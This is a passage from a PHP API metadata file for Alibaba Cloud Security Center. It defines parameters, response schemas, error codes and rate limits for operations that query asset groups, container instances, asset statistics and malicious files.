['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeGraph4InvestigationOnline', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"EntityTypeList\\": [\\n {\\n \\"DisplayOrder\\": 1,\\n \\"DisplayColor\\": \\"#fff\\",\\n \\"DisplayIcon\\": \\"https://img.alicdn.com/tfs/TB176P5OgDqK1RjSZSyXXaxEVXa-49-48.png\\",\\n \\"Name\\": \\"alert\\",\\n \\"Id\\": \\"1\\"\\n }\\n ],\\n \\"EdgeList\\": [\\n {\\n \\"Name\\": \\"bash->apt-get\\",\\n \\"EndId\\": \\"f944c2362c7e111dee16f0e70ad2xxxx\\",\\n \\"EndType\\": \\"process\\",\\n \\"StartId\\": \\"f944c2362c7e111dee16f0e70ad2xxxx\\",\\n \\"StartType\\": \\"file\\",\\n \\"Time\\": \\"2024-07-01 15:25:46\\",\\n \\"Type\\": \\"process_spawn_process\\"\\n }\\n ],\\n \\"VertexList\\": [\\n {\\n \\"Uuid\\": \\"5c081b02-f66a-47a4-bd2f-79ee3eafxxxx\\",\\n \\"Type\\": \\"alert\\",\\n \\"Name\\": \\"1a79b3a10ad5e6cad090dd697a7axxxxx\\",\\n \\"Time\\": \\"2024-07-02 16:14:01\\",\\n \\"Properties\\": \\"{\'DomainName\': {\'SupportScratchDetection\': False, \'Description\': \'The name of the domain.\', \'Required\': True, \'UpdateAllowed\': False, \'Type\': \'string\', \'Immutable\': False}}\\",\\n \\"NeighborList\\": [\\n {\\n \\"HasMore\\": true,\\n \\"Count\\": 1,\\n \\"Type\\": \\"alert\\"\\n }\\n ]\\n }\\n ],\\n \\"RelationTypeList\\": [\\n {\\n \\"Name\\": \\"spawn process\\",\\n \\"Directed\\": 1,\\n \\"DisplayColor\\": \\"#fff\\",\\n \\"DisplayIcon\\": \\"https://img.alicdn.com/imgextra/i4/O1CN01ft6rvQ22uUX2JsTmv_!!6000000007180-55-tps-12-12.svg\\"\\n }\\n ]\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"C699E4E4-F2F4-58FC-A949-457FFE59****\\"\\n}","type":"json"}]', ], 'DescribeGroupStruct' => [ 'summary' => 'Retrieves the group structure.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response object.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '9FBC6E47-7508-58C9-9E76-528E118C****', 'title' => ''], 'GroupId' => ['description' => 'The ID of the asset group.', 'type' => 'integer', 'format' => 'int64', 'example' => '958****', 'title' => ''], 'GroupName' => ['description' => 'The name of the server group.', 'type' => 'string', 'example' => 'TestGroupName', 'title' => ''], 'MachineNum' => ['description' => 'The number of servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'GroupIndex' => ['description' => 'The sort order number.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'GroupFather' => ['description' => 'The parent node of the group.', 'type' => 'integer', 'format' => 'int32', 'example' => '958****', 'title' => ''], 'GroupLevel' => ['description' => 'The level of the application group.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'GroupFlag' => ['description' => 'The type of the server group. Valid values:'."\n" .'- **0**: default group'."\n" .'- **1**: other group.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Groups' => [ 'description' => 'The collection of child groups.', 'type' => 'array', 'items' => ['description' => 'The fields are the same as those of the parent level.', 'type' => 'string', 'example' => '['."\n" .' {'."\n" .' "groupName": "testfuxian",'."\n" .' "groupFather": 0,'."\n" .' "groupId": 11501234,'."\n" .' "childGroups": [],'."\n" .' "groupLevel": 1,'."\n" .' "groupIndex": 100,'."\n" .' "groupFlag": 1'."\n" .' },'."\n" .' {'."\n" .' "groupName": "testfuxian",'."\n" .' "groupFather": 0,'."\n" .' "groupId": 11501234,'."\n" .' "childGroups": [],'."\n" .' "groupLevel": 1,'."\n" .' "groupIndex": 100,'."\n" .' "groupFlag": 1'."\n" .' }'."\n" .']', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve group structure', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupStruct'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:DescribeGroupStruct', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9FBC6E47-7508-58C9-9E76-528E118C****\\",\\n \\"GroupId\\": 0,\\n \\"GroupName\\": \\"TestGroupName\\",\\n \\"MachineNum\\": 30,\\n \\"GroupIndex\\": 1,\\n \\"GroupFather\\": 0,\\n \\"GroupLevel\\": 2,\\n \\"GroupFlag\\": 0,\\n \\"Groups\\": [\\n \\"[\\\\n\\\\t{\\\\n\\\\t\\\\t\\\\\\"groupName\\\\\\": \\\\\\"testfuxian\\\\\\",\\\\n\\\\t\\\\t\\\\\\"groupFather\\\\\\": 0,\\\\n\\\\t\\\\t\\\\\\"groupId\\\\\\": 11501234,\\\\n\\\\t\\\\t\\\\\\"childGroups\\\\\\": [],\\\\n\\\\t\\\\t\\\\\\"groupLevel\\\\\\": 1,\\\\n\\\\t\\\\t\\\\\\"groupIndex\\\\\\": 100,\\\\n\\\\t\\\\t\\\\\\"groupFlag\\\\\\": 1\\\\n\\\\t},\\\\n\\\\t{\\\\n\\\\t\\\\t\\\\\\"groupName\\\\\\": \\\\\\"testfuxian\\\\\\",\\\\n\\\\t\\\\t\\\\\\"groupFather\\\\\\": 0,\\\\n\\\\t\\\\t\\\\\\"groupId\\\\\\": 11501234,\\\\n\\\\t\\\\t\\\\\\"childGroups\\\\\\": [],\\\\n\\\\t\\\\t\\\\\\"groupLevel\\\\\\": 1,\\\\n\\\\t\\\\t\\\\\\"groupIndex\\\\\\": 100,\\\\n\\\\t\\\\t\\\\\\"groupFlag\\\\\\": 1\\\\n\\\\t}\\\\n]\\"\\n ]\\n}","type":"json"}]', ], 'DescribeGroupedContainerInstances' => [ 'summary' => 'Queries the list of containers based on the specified group type.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The conditions for searching assets. This parameter is in JSON format. Separate multiple conditions with commas (,). Example: `[{"name":"riskStatus","value":"YES"},{"name":"riskLevel","value":"2"}]`.'."\n" .'> You can search for assets by instance ID, instance name, VPC ID, region, public IP address, and other conditions. Call [DescribeCriteria](~~DescribeCriteria~~) to query the supported search conditions.', 'type' => 'string', 'required' => false, 'example' => '[{"name":"riskStatus","value":"YES"},{"name":"riskLevel","value":"2"}]', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'The logical relationship among multiple search conditions. Valid values:'."\n" .'- **OR**: The search conditions are evaluated with a logical OR.'."\n" .'- **AND**: The search conditions are evaluated with a logical AND.', 'type' => 'string', 'required' => false, 'example' => 'OR', 'title' => ''], ], [ 'name' => 'GroupField', 'in' => 'query', 'schema' => ['description' => 'The group type to query. Valid values:'."\n" .'- **pod**: pod'."\n" .'- **appName**: application name'."\n" .'- **namespace**: namespace'."\n" .'- **clusterId**: cluster ID'."\n" .'- **image**: image.', 'type' => 'string', 'required' => true, 'example' => 'pod', 'title' => ''], ], [ 'name' => 'FieldValue', 'in' => 'query', 'schema' => ['description' => 'The search condition for the specified group type. Set the search condition based on the type specified by GroupField:'."\n" .'- If **GroupField** is set to **pod**: specify the pod name to query.'."\n" .'- If **GroupField** is set to **appName**: specify the application name to query.'."\n" .'- If **GroupField** is set to **namespace**: specify the namespace to query.'."\n" .'- If **GroupField** is set to **clusterId**: specify the cluster ID to query.'."\n" .'- If **GroupField** is set to **image**: specify the image name to query.'."\n" .'> All the preceding search conditions support fuzzy match.', 'type' => 'string', 'required' => false, 'example' => 'cas-adad-qeqwe', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of container assets to display on each page when paging is used. Default value: **20**, which indicates that 20 container assets are displayed on each page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '4E5BFDCF-B9DD-430D-9DA4-151BCB581C9D', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of container assets displayed on each page in a paging query. Default value: **20**, which indicates that 20 container assets are displayed on each page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of container assets returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '25', 'title' => ''], 'Count' => ['description' => 'The number of container assets displayed on the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'GroupedContainerInstanceList' => [ 'description' => 'The list of container asset information returned.', 'type' => 'array', 'items' => [ 'description' => 'The container asset information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: high'."\n" .'- **medium**: medium'."\n" .'- **low**: low.', 'type' => 'string', 'example' => 'low', 'title' => ''], 'HostIp' => ['description' => 'The host IP address of the container cluster.', 'type' => 'string', 'example' => '172.114.XX.XX', 'title' => ''], 'Pod' => ['description' => 'The pod name.', 'type' => 'string', 'example' => 'csi-plugin-2n****', 'title' => ''], 'RiskStatus' => ['description' => 'The risk status. Valid values:'."\n" .'- **NO**: No risk.'."\n" .'- **YES**: At risk.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'CreateTime' => ['description' => 'The timestamp when the cluster was created, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1600076893000', 'title' => ''], 'Namespace' => ['description' => 'The namespace of the cluster.', 'type' => 'string', 'example' => 'kube-system', 'title' => ''], 'CusterState' => ['description' => 'The running status of the cluster. Valid values:'."\n" .'- **running**: The cluster is running.'."\n" .'- **stopped**: The cluster is stopped.'."\n" .'- **deleted**: The cluster is deleted.'."\n" .'- **delete_failed**: The cluster failed to be deleted.'."\n" .'- **failed**: The cluster failed to be created.', 'type' => 'string', 'example' => 'running', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server instance.', 'type' => 'string', 'example' => 'i-8vb9ul5xec4tua4q****', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region in which the instance resides.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'AppName' => ['description' => 'The application name.', 'type' => 'string', 'example' => 'oss-liveness-probe', 'title' => ''], 'InstanceCount' => ['description' => 'The number of pods, applications, clusters, or namespaces returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], 'ClusterType' => ['description' => 'The type of the cluster. Valid values:'."\n" .'- **Kubernetes**: dedicated Kubernetes cluster'."\n" .'- **ManagedKubernetes**: standard managed cluster (edge cluster)'."\n" .'- **Ask**: standard serverless cluster.', 'type' => 'string', 'example' => 'ManagedKubernetes', 'title' => ''], 'ClusterName' => ['description' => 'The name of the cluster.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'PodIp' => ['description' => 'The IP address of the pod.', 'type' => 'string', 'example' => '172.114.XX.XX', 'title' => ''], 'VulCount' => ['description' => 'The number of vulnerabilities detected in the current pod, application, namespace, or cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AlarmCount' => ['description' => 'The number of alerts detected in the current pod, application, namespace, or cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskInstanceCount' => ['description' => 'The number of instances that are at risk.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the cluster.', 'type' => 'string', 'example' => 'cf3824769c85441b4bf3****', 'title' => ''], 'Image' => ['description' => 'The container image.', 'type' => 'string', 'example' => 'registry-vpc.ap-southeast-5.aliyuncs.com/log-service-release/sls-connector:1.1.77', 'title' => ''], 'ImageRepoNamespace' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'example' => 'name001', 'title' => ''], 'ImageRepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'test-003', 'title' => ''], 'ImageRepoTag' => ['description' => 'The tag of the image repository.', 'type' => 'string', 'example' => 'dev-20220512-2', 'title' => ''], 'ImageDigest' => ['description' => 'The digest value of the image.', 'type' => 'string', 'example' => '58e58c013f70bbfde140c8a55c1078074b3483479428d4069aa946827fd566cf', 'title' => ''], 'ImageUuid' => ['description' => 'The UUID of the image.', 'type' => 'string', 'example' => 'e4bdec1d9ba7e0967111a7ea467c****', 'title' => ''], 'HcCount' => ['description' => 'The total number of baseline checks detected in the current pod, application, namespace, or cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'SyncOpen' => ['description' => 'The log audit synchronization switch for the cluster. Valid values:'."\n" .'- **0**: disabled'."\n" .'- **1**: enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SyncStatus' => ['description' => 'The log audit synchronization status for the cluster. Valid values:'."\n" .'- **0**: synchronization failed'."\n" .'- **1**: synchronization succeeded.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query container list information', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupedContainerInstances'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeGroupedContainerInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4E5BFDCF-B9DD-430D-9DA4-151BCB581C9D\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 25,\\n \\"Count\\": 20\\n },\\n \\"GroupedContainerInstanceList\\": [\\n {\\n \\"RiskLevel\\": \\"low\\",\\n \\"HostIp\\": \\"172.114.XX.XX\\",\\n \\"Pod\\": \\"csi-plugin-2n****\\",\\n \\"RiskStatus\\": \\"NO\\",\\n \\"CreateTime\\": 1600076893000,\\n \\"Namespace\\": \\"kube-system\\",\\n \\"CusterState\\": \\"running\\",\\n \\"InstanceId\\": \\"i-8vb9ul5xec4tua4q****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"AppName\\": \\"oss-liveness-probe\\",\\n \\"InstanceCount\\": 9,\\n \\"ClusterType\\": \\"ManagedKubernetes\\",\\n \\"ClusterName\\": \\"test\\",\\n \\"PodIp\\": \\"172.114.XX.XX\\",\\n \\"VulCount\\": 1,\\n \\"AlarmCount\\": 1,\\n \\"RiskInstanceCount\\": 1,\\n \\"ClusterId\\": \\"cf3824769c85441b4bf3****\\",\\n \\"Image\\": \\"registry-vpc.ap-southeast-5.aliyuncs.com/log-service-release/sls-connector:1.1.77\\",\\n \\"ImageRepoNamespace\\": \\"name001\\",\\n \\"ImageRepoName\\": \\"test-003\\",\\n \\"ImageRepoTag\\": \\"dev-20220512-2\\",\\n \\"ImageDigest\\": \\"58e58c013f70bbfde140c8a55c1078074b3483479428d4069aa946827fd566cf\\",\\n \\"ImageUuid\\": \\"e4bdec1d9ba7e0967111a7ea467c****\\",\\n \\"HcCount\\": 20,\\n \\"SyncOpen\\": 1,\\n \\"SyncStatus\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeGroupedInstances' => [ 'summary' => 'Query asset statistics by specified aggregation dimensions.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92085', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'MachineTypes', 'in' => 'query', 'schema' => ['description' => 'The type of assets to query. Fixed value: **ecs**, indicating Elastic Compute Service (ECS) instances.', 'type' => 'string', 'required' => false, 'example' => 'ecs', 'title' => ''], ], [ 'name' => 'GroupField', 'in' => 'query', 'schema' => ['description' => 'The filter condition for querying assets. Valid values:'."\n" ."\n" .'- **groupId**: queries assets by group.'."\n" .'- **regionId**: queries assets by region.'."\n" .'- **vpcInstanceId**: queries assets by Virtual Private Cloud (VPC).', 'type' => 'string', 'required' => true, 'example' => 'groupId', 'title' => ''], ], [ 'name' => 'FieldValue', 'in' => 'query', 'schema' => ['description' => 'The name of the asset group to query. Fuzzy search is supported.', 'type' => 'string', 'required' => false, 'example' => 'test-01', 'title' => ''], ], [ 'name' => 'NoPage', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable paginated queries. Default value: **true**. Valid values:'."\n" .'- **true**: enables paginated queries.'."\n" .'- **false**: disables paginated queries.'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paginated query. Default value: **20**, indicating that 20 entries of asset information are displayed per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number from which query results start to be displayed. Default value: **1**, indicating that query results are displayed starting from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'The server vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud assets'."\n" .'- **1**: non-cloud assets'."\n" .'- **2**: IDC assets'."\n" .'- **3**, **4**, **5**, **7**: assets from other cloud providers'."\n" .'- **8**: lightweight assets', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'Vendors', 'in' => 'query', 'schema' => ['description' => 'The server vendors. Separate multiple vendors with commas (,). Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud assets'."\n" .'- **1**: non-cloud assets'."\n" .'- **2**: IDC assets'."\n" .'- **3**, **4**, **5**, **7**: assets from other cloud providers'."\n" .'- **8**: lightweight assets', 'type' => 'string', 'required' => false, 'example' => '0,8', 'title' => ''], ], [ 'name' => 'SaleVersionCheckCode', 'in' => 'query', 'schema' => ['description' => 'The edition filter for querying assets. Valid values:'."\n" ."\n" .'- **sas\\_gte\\_advanced**: Advanced edition or higher'."\n" .'- **sas\\_gte\\_enterprise**: Enterprise edition or higher'."\n" .'- **sas\\_gt\\_basic**: paid editions'."\n" .'- **sas\\_eq\\_advanced**: Advanced edition only'."\n" .'- **sas\\_gt\\_anti\\_virus**: editions higher than Anti-virus edition', 'type' => 'string', 'required' => false, 'example' => 'sas_gt_basic', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '52A3AEE6-114A-499D-8990-4BA9B27FE0AA', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page in a paginated query. Default value: **20**, indicating that 20 entries of asset information are displayed per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of asset entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of asset entries displayed on the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Instances' => [ 'description' => 'The list of asset information returned.', 'type' => 'array', 'items' => [ 'description' => 'The asset information.', 'type' => 'object', 'properties' => [ 'AsapVulInstanceCount' => ['description' => 'The number of assets that have high-severity vulnerabilities.', 'type' => 'integer', 'format' => 'int64', 'example' => '11', 'title' => ''], 'UnProtectedInstanceCount' => ['description' => 'The number of assets that are not protected by Security Center.', 'type' => 'string', 'example' => '32', 'title' => ''], 'FieldAliasName' => ['description' => 'The name of the server group.', 'type' => 'string', 'example' => 'testA', 'title' => ''], 'InstanceCount' => ['description' => 'The total number of assets of the specified asset type.'."\n" ."\n" .'> If the **MachineTypes** request parameter is not set, the value of this parameter is the total number of assets of all types.', 'type' => 'string', 'example' => '205', 'title' => ''], 'RiskInstanceCount' => ['description' => 'The number of assets that have security risks.', 'type' => 'string', 'example' => '172', 'title' => ''], 'GroupFlag' => ['description' => 'The type of the server group. Valid values:'."\n" .'- **0**: the default group'."\n" .'- **1**: other groups', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AuthVersionCheckCount' => ['description' => 'The number of assets that meet the edition requirements.', 'type' => 'integer', 'format' => 'int32', 'example' => '205', 'title' => ''], 'Os' => ['description' => 'The operating system type of the asset. Valid values:'."\n" .'- **windows**'."\n" .'- **linux**'."\n" .'>This field is returned only when **Lang** is set to **zh**.>', 'type' => 'string', 'example' => 'windows', 'title' => ''], 'InstanceCoreCount' => ['description' => 'The total number of compute cores of all assets of the specified asset type.'."\n" ."\n" .'> If the **MachineTypes** request parameter is not set, the value of this parameter is the total number of compute cores of assets of all types.', 'type' => 'integer', 'format' => 'int64', 'example' => '610', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query Asset Statistics', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupedInstances'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeGroupedInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"52A3AEE6-114A-499D-8990-4BA9B27FE0AA\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 5,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 20\\n },\\n \\"Instances\\": [\\n {\\n \\"AsapVulInstanceCount\\": 11,\\n \\"UnProtectedInstanceCount\\": \\"32\\",\\n \\"FieldAliasName\\": \\"testA\\",\\n \\"InstanceCount\\": \\"205\\",\\n \\"RiskInstanceCount\\": \\"172\\",\\n \\"GroupFlag\\": 1,\\n \\"AuthVersionCheckCount\\": 205,\\n \\"Os\\": \\"windows\\",\\n \\"InstanceCoreCount\\": 610\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeGroupedMaliciousFiles' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92086', 'abilityTreeNodes' => ['FEATUREsasA0IBMB'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Levels', 'in' => 'query', 'schema' => ['description' => 'The severity levels of the malicious samples in container images that you want to query. Separate multiple values with commas (,). Valid values:'."\n" .'- **serious**: urgent'."\n" .'- **suspicious**: suspicious'."\n" .'- **remind**: reminder.', 'type' => 'string', 'required' => false, 'example' => 'serious', 'title' => ''], ], [ 'name' => 'FuzzyMaliciousName', 'in' => 'query', 'schema' => ['description' => 'The name of the malicious file that you want to query.'."\n" .'> Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => 'Mining', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Minimum value: **1**. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query. Default value: **20**.', 'type' => 'string', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'RepoRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the image repository. Valid values:'."\n" .'- **cn-beijing**: China (Beijing)'."\n" .'- **cn-zhangjiakou**: China (Zhangjiakou)'."\n" .'- **cn-hangzhou**: China (Hangzhou)'."\n" .'- **cn-shanghai**: China (Shanghai)'."\n" .'- **cn-shenzhen**: China (Shenzhen)'."\n" .'- **cn-hongkong**: Hong Kong (China)'."\n" .'- **ap-southeast-1**: Singapore'."\n" .'- **ap-southeast-5**: Indonesia (Jakarta)'."\n" .'- **us-east-1**: US (Virginia)'."\n" .'- **us-west-1**: US (Silicon Valley)'."\n" .'- **eu-central-1**: Germany (Frankfurt)'."\n" .'- **eu-west-1**: UK (London).', 'type' => 'string', 'required' => false, 'example' => 'cn-shanghai', 'title' => ''], ], [ 'name' => 'RepoInstanceId', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the container image.'."\n" .'> Call the [ListRepository](~~145293~~) operation of Container Registry to obtain the value of the **InstanceId** response parameter.', 'type' => 'string', 'required' => false, 'example' => 'cri-datvailb****', 'title' => ''], ], [ 'name' => 'RepoId', 'in' => 'query', 'schema' => ['description' => 'The ID of the image repository.'."\n" .'> Call the [ListRepository](~~145293~~) operation of Container Registry to obtain the value of the **RepoId** response parameter.', 'type' => 'string', 'required' => false, 'example' => 'crr-vridcl4****', 'title' => ''], ], [ 'name' => 'RepoName', 'in' => 'query', 'schema' => ['description' => 'The name of the image repository.'."\n" .'> Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => ' centos', 'title' => ''], ], [ 